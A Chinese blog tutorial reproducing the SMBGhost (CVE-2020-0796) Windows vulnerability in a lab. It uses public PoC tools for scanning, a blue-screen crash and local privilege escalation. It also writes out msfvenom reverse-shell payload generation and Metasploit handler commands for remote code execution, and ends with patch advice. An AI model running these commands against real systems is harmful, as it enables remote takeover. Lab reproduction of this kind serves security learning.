CVE-2020-0796 漏洞利用教程

最新推荐文章于 2024-04-19 04:13:05 发布
最新推荐文章于 2024-04-19 04:13:05 发布
阅读量2.9k 收藏 13
点赞数 2
分类专栏: 漏洞复现 文章标签: 安全 windows
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_41924764/article/details/109282605
版权

目录

漏洞描述

  Microsoft服务器消息块3.1.1(SMBv3)协议处理某些请求的方式中存在一个远程执行代码漏洞,也称为“ Windows SMBv3客户端/服务器远程执行代码漏洞”。

影响版本

  • 适用于32位系统的Windows 10版本1903
  • Windows 10 1903版(用于基于ARM64的系统)
  • Windows 10 1903版(用于基于x64的系统)
  • 适用于32位系统的Windows 10版本1909
  • Windows 10 1909版(用于基于ARM64的系统)
  • Windows 10版本1909(用于基于x64的系统)
  • Windows Server 1903版(服务器核心安装 )
  • Windows Server版本1909(服务器核心安装)

漏洞检测

利用工具:
https://github.com/GuoKerS/aioScan_CVE-2020-0796

使用方法:

#安装python模块
python3 -m pip install netaddr

#脚本利用 python3 aioscan_2020_0796.py <ip>
python3 aioscan_2020_0796.py 192.168.206.137

在这里插入图片描述
提示Vulnerable!!表示存在漏洞

漏洞利用

Windows 10 1903版(用于基于x64的系统) 迅雷下载地址:
thunder://QUFodHRwOi8veHoxLmRhb2hhbmc0LmNvbS9jbl93aW5kb3dzXzEwX2NvbnN1bWVyX2VkaXRpb25zX3ZlcnNpb25fMTkwM194NjRfZHZkXzhmMDUyNDFkLmlzb1pa

蓝屏攻击

利用工具:
https://github.com/eerykitty/CVE-2020-0796-PoC

使用教程:

#进入下载好的脚本目录,安装python模块
python3 -m pip install -r requirements-test.txt
python3 -m pip install ntlm_auth pyasn1 cryptography

#脚本利用
#python3 CVE-2020-0796.py <ip>
python3 CVE-2020-0796.py 192.168.206.137

在这里插入图片描述

远程代码执行

python版本:3.6.6
需要用到python3.6版本,3.7执行脚本后会蓝屏,并不能远程命令执行。
下载地址:https://www.python.org/downloads/release/python-366/

在这里插入图片描述

利用工具:
https://github.com/chompie1337/SMBGhost_RCE_PoC

下载好工具后,先生成反弹shell的shellcode:

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.206.128 lport=4444 -f py -o shellcode.txt

在这里插入图片描述

shellcode.txt中的shell复制出来,替换buf为USER_PAYLOAD

小技巧,windows的文本工具可以替换字符
在这里插入图片描述
将更改好的shellcode复制到我们下载好的脚本exploit.py文件中,替换掉USER_PAYLOAD
在这里插入图片描述
kali开启msf监听:

msfconsole

use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.206.128
set lport 4444
run

脚本exp利用攻击:

python36 exploit.py -ip 192.168.206.141

执行显示到[+] Press a key to execute shellcode!时回车
在这里插入图片描述
msf获取shell权限:

shell

在这里插入图片描述

本地提权

利用攻击下载:
https://github.com/danigargu/CVE-2020-0796

需要生成exe,生成exe需要利用到Visual Studio

下载好后打开Visual Studio,载入项目,打开CVE-2020-0796.sln文件
在这里插入图片描述
在这里插入图片描述
生成exe
在这里插入图片描述
生成好后会在你exp目录下存在一个\x64\Debug\文件夹

在这里插入图片描述
将exe文件复制到windows10中,需要先关闭防火墙并关闭实时防护
在这里插入图片描述
脚本利用:

exe是直接运行即可
在这里插入图片描述

修复建议

  1. 及时更新windows或安装补丁:https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0796
  2. 运行regedit.exe,打开注册表编辑器,在HKLM\SYSTEM\CurrentControlSet\Services\LanmanServer\ Parameters建立一个名为DisableCompressionDWORD,值为1,禁止SMB的压缩功能。
丶没胡子的猫
关注
  • 2
    点赞
  • 13
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CVE-2020-0796-PoC-master.zip
06-11
SMB 3.1.1协议中处理压缩消息时,对其中数据没有经过安全检查,直接使用会引发缓冲区溢出,可能被攻击者利用远程执行任意代码。 SMBV3在通信过程中默认启动压缩/解压缩机制。如下图所示,攻击者在SMB压缩转换包的...
CVE-2020-0796复现(基于kali实现)
m0_74988425的博客
03-06 1004
本次漏洞源于SMBv3没有正确处理压缩的数据包,在解压数据包的时候使用客户端传过来的长度进行解压时,并没有检查长度是否合法,最终导致整数溢出。然而,在这里使用的是`bind_tcp`,它不需要指定远程主机,因此在这种情况下,这个命令没有实际效果。CVE-2020-0796是指影响微软Windows 10和Windows Server 2019的一个漏洞,通常被称为"SMBGhost"或"CoronaBlue"。2. 网络分段: 将网络分为不同的区域,将不同的系统放置在不同的网络中。
CVE-2020-0796 漏洞复现
迷风小白
06-05 3210
0x00 漏洞介绍 2020年3月10日,微软在其官方SRC发布了CVE-2020-0796安全公告(ADV200005,MicrosoftGuidance for Disabling SMBv3 Compression),公告表示在Windows SMBv3版本的客户端和服务端存在远程代码执行漏洞。同时指出该漏洞存在于MicroSoft Server Message Block 3.1.1协议处理特定请求包的功能中,攻击者利用该漏洞可在目标SMB Server或者Client中执行任意代码。 0x01
【网络安全---漏洞复现】Tomcat CVE-2020-1938 漏洞复现和利用过程(特详细)
最新发布
2401_83946570的博客
04-19 866
python2 ‘Tomcat-ROOT路径下文件读取(CVE-2020-1938).py’ -p 8009 -f /WEB-INF/web.xml 192.168.31.160。
CVE-2020-0796 漏洞分析报告(最详细)
RatOnSea的博客
05-28 9551
CVE-2020-0796 漏洞分析报告 1 漏洞介绍 1.1 名称 微软SMBv3 Client/Server远程代码执行漏洞CVE-2020-0796 1.2 影响范围 Windows 10 Version 1903 for 32-bit Systems Windows 10 Version 1903 for x64-based Systems Windows 10 Version 1903 for ARM64-based Systems Windows Server, Version 1903 (Se
CVE-2020-0796永恒之黑漏洞浅谈与利用
热门推荐
qq_39120795的博客
11-18 1万+
微软发布安全公告披露了一个最新的SMB远程代码执行漏洞(CVE-2020-0796),攻击者利用该漏洞无须权限即可实现远程代码执行,一旦被成功利用,其危害不亚于永恒之蓝,全球 10 万台服务器或成首轮攻击目标。
CVE-2020-0796
m_de_g的博客
10-08 6492
CVE-2020-0796(永恒之黑) 一.对应出现的版本 永恒之黑的对象为采用Windows 10 1903之后的所有终端节点,如Windows家用版、专业版、企业版、教育版,Windows 10 1903 (19H1)、Windows 10 1909、 Windows Server 19H1均为潜在攻击目标,Windows 7不受影响。 原理为由于SMB 3.1.1协议中处理压缩消息时,对其中数据没有经过安全检查,直接使用会引发内存破坏漏洞,可能被攻击者利用远程执行任意代码。 首先下载 CVE-2020
CVE-2020-0796:永恒之黑
Foreverlove112的博客
10-01 985
CVE-2020-0796:永恒之黑
CVE-2020-0796漏洞利用
彼岸花苏陌的博客
12-01 784
CVE-2020-0796漏洞利用 漏洞环境 攻击方:192.168.216.136(kali linux) 靶机:192.168.216.140(windows 10) 攻击所需软件:暂无 利用方法: 1.先下载检测程序 cd ~ git clone https://github.com/ollypwn/SMBGhost.git cd SMBGhost/ python3 scanner.py 192.168.216.140 但是需要安装netaddr,否则会出现这个错误 Traceback (most
cve-2020-14750.zip9(补丁升级)
05-26
2020年11月2日,Oracle官方发布了此安全警报针对Oracle WebLogic Server中的远程代码执行漏洞CVE-2020-14750,此漏洞可以在没有身份验证的情况下进行远程攻击,也就是说,可以在不需要用户名和密码的情况下通过网络...
SAP_RECON:CVE-2020-6287,CVE-2020-6286的PoC(SAP RECON漏洞)
04-01
CVE-2020-6287,CVE-2020-6286的PoC(SAP RECON漏洞) ff! RECON(NetWeaver上的可远程利用代码)? 伙计们,真的吗? 那是您想到的最好的代号? :) 此脚本可检查SAP LM配置向导是否缺少授权检查漏洞,并且PoC...
CVE-2020-0796 利用SMBGhost进行本地特权升级:Writeup + POC
子曰小玖的博客
04-08 1162
利用SMBGhost(CVE-2020-0796)进行本地特权升级:Writeup + POC 介绍 CVE-2020-0796是SMBv3.1.1(也称为“ SMBGhost”)的压缩机制中的错误。该错误影响Windows 10版本1903和1909,大约三周前由Microsoft宣布并修补。得知此消息后,我们将浏览所有细节并创建一个快速的POC(概念验证),以演示如何通过引发BSOD(死...
漏洞复现_CVE-2020-0796 永恒之黑漏洞_遇坑_已解决
qq_51550750的博客
06-09 4757
永恒之黑漏洞复现
【漏洞复现】CVE-2020-0796永恒之黑漏洞复现
qq_45244158的博客
03-29 1万+
文章目录一、漏洞描述二、影响版本三、漏洞检测四、漏洞复现环境五、(1)漏洞利用之蓝屏五、(2)漏洞利用之本地提权五、(3)漏洞利用之反弹shell1、使用msfvenom生成payload2、替换payload3. 开启msf监听模块4. 运行exploit.py脚本,发起攻击反弹shell5. 执行成功,查看监听的地方,成功得到shell六、修复建议1.安装官方补丁2.禁用SMBv3压缩3.设置防火墙策略关闭相关端口4.通过IP安全策略屏蔽危险端口,bat执行添加防火墙策略,关闭危险服务 一、漏洞描述.
CVE-2020-0796 SMB远程代码执行漏洞 分析、验证及加固
Adminxe的博客
05-15 8854
0x01漏洞描述 CVE-2020-0796是存在于微软服务器SMB协议中的一个“蠕虫化”漏洞,该漏洞未包含 在微软本月发布的补丁中,是在补丁的序言中泄露的。目前微软尚未发布任何技术详情,思科Talos团队和Fortinet公司提供了简短概述,目前尚不清楚该漏洞的补丁何时发布。 Fortinet公司指出,该漏洞是“微软 SMB 服务器中的一个缓冲区溢出漏洞”,严重等级为最高评分,“该漏洞由易...
实验记录一之SQL注入
qq_54580973的博客
05-07 267
这只是我一次实验过程的记录!!!! DVWA(Damn Vulnerable Web Application)是randomstorm的一个开源项目。一个用来进行安全脆弱性鉴定的PHP/MySQL Web应用,旨在为安全专业人员测试自己的专业技能和工具提供合法的环境,帮助web开发者更好的理解web应用安全防范的过程。 安装部署phpStudy+DVWA漏洞演练平台 安装phpstudy,安装完成后启动phpStudy主界面,当看到 Apache 和 MySQL 文字后面红色的圆点变成绿色时,表示服务启动成
CVE-2020-0796永恒之黑漏洞复现 超详细过程(成功复现)
unlash的博客
10-20 4149
CVE-2020-0796永恒之黑漏洞复现 超详细过程 成功复现 msf监听成功反弹shell 漏洞描述 影响版本 修复建议
cve-2020-0796漏洞逆向分析
11-21
CVE-2020-0796漏洞,也被称为"SMBGhost",是一个影响微软Windows操作系统的严重漏洞。该漏洞存在于Windows 10版本1903和1909之间的SMBv3协议中,攻击者可以利用此漏洞执行远程代码,从而控制受感染的系统。 对CVE-2020-0796漏洞进行逆向分析是为了深入了解其工作原理及漏洞利用的具体细节。逆向分析通常包括静态和动态分析两个方面。 首先,静态分析是通过对漏洞程序的反汇编、分析源代码或查看二进制文件等方法来了解漏洞的工作原理。这可以帮助研究人员识别漏洞的关键功能、漏洞的出现位置以及可能的漏洞利用方式。 其次,动态分析是在虚拟化环境中或实际受感染的系统上运行漏洞程序,监视其行为并捕获关键信息。通过动态分析,研究人员能够观察到漏洞利用的具体过程,从而理解攻击者是如何利用漏洞来执行远程代码或获取系统权限的。 在逆向分析过程中,研究人员需要使用一些特定的工具,如反汇编器、调试器以及网络分析工具等。这些工具可以帮助研究人员获取漏洞程序的内部结构、系统调用、网络通信等关键信息,有助于理解漏洞的利用方式和脆弱点。 通过逆向分析CVE-2020-0796漏洞,能够帮助安全专业人员更好地理解漏洞的工作原理,从而开发相应的补丁或安全措施以防止攻击者利用该漏洞入侵系统。此外,逆向分析还有助于提高安全分析人员的能力和知识,进一步提升网络安全的整体水平。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值